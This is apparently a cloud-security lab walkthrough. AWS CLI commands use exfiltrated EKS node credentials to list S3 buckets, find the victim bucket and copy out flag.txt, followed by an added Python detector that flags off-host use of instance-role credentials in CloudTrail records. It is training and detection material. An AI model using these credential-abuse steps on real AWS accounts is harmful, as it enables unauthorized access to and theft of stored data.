Lab: Privilege Escalation & S3 Exploitation for Flag

Continue in the same terminal where the exfiltrated credentials are configured.

  • Change directory to jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Use the node credentials to list the internal S3 bucket and get the flag.

S3 endpoints are region agnostic.

aws s3 ls

  • Get the data from the internal bucket, demonstrating that the attacker was able to exfiltrate the data.
export VICTIM_BUCKET=$(aws s3 ls | grep 'peachycloudsecurity-' | awk '{print $3}')

aws s3 ls s3://$VICTIM_BUCKET
aws s3 cp s3://$VICTIM_BUCKET/flag.txt . && cat flag.txt
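
A defender-side check for the steps above, as an added example that is not part of the original lab material: it scans CloudTrail records for S3 calls made with an EC2 instance-role session (the node credentials) from a source address outside the cluster's network. The records are constructed, and the account ID, role name, instance ID, IP addresses, bucket suffix and the trusted CIDR `10.0.0.0/16` are assumptions; in practice the trusted list would hold the VPC range and its NAT egress addresses.

```python
import ipaddress
import json

# Constructed CloudTrail records; account ID, role name, instance ID, IPs and
# the bucket suffix are placeholders. GetObject and ListObjects appear only
# when S3 data events are enabled on the trail.
RAW = """
{"eventName":"GetObject","sourceIPAddress":"10.0.12.34","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::111122223333:assumed-role/example-node-role/i-0123456789abcdef0"},"requestParameters":{"bucketName":"peachycloudsecurity-example","key":"app/config.json"}}
{"eventName":"ListBuckets","sourceIPAddress":"198.51.100.23","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::111122223333:assumed-role/example-node-role/i-0123456789abcdef0"},"requestParameters":null}
{"eventName":"GetObject","sourceIPAddress":"198.51.100.23","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::111122223333:assumed-role/example-node-role/i-0123456789abcdef0"},"requestParameters":{"bucketName":"peachycloudsecurity-example","key":"flag.txt"}}
{"eventName":"ListBuckets","sourceIPAddress":"198.51.100.23","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::111122223333:user/example-admin"},"requestParameters":null}
{"eventName":"GetObject","sourceIPAddress":"ec2.amazonaws.com","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::111122223333:assumed-role/example-node-role/i-0123456789abcdef0"},"requestParameters":{"bucketName":"peachycloudsecurity-example","key":"app/config.json"}}
"""
SAMPLE_EVENTS = [json.loads(line) for line in RAW.strip().splitlines()]

S3_EVENTS = {"ListBuckets", "ListObjects", "GetObject"}


def instance_session(identity):
    """Return the instance ID if this is an EC2 instance-role session, else None."""
    if identity.get("type") != "AssumedRole":
        return None
    session = identity.get("arn", "").rsplit("/", 1)[-1]
    return session if session.startswith("i-") else None


def offhost_s3_use(events, trusted_cidrs):
    """Flag S3 calls by instance-role sessions whose source IP is not trusted."""
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for ev in events:
        instance = instance_session(ev.get("userIdentity", {}))
        if instance is None or ev.get("eventName") not in S3_EVENTS:
            continue
        try:
            src = ipaddress.ip_address(ev.get("sourceIPAddress", ""))
        except ValueError:
            continue  # an AWS service name rather than an IP address
        if not any(src in net for net in nets):
            params = ev.get("requestParameters") or {}
            findings.append((instance, ev["eventName"], str(src), params.get("key")))
    return findings


if __name__ == "__main__":
    for finding in offhost_s3_use(SAMPLE_EVENTS, ["10.0.0.0/16"]):
        print(finding)
```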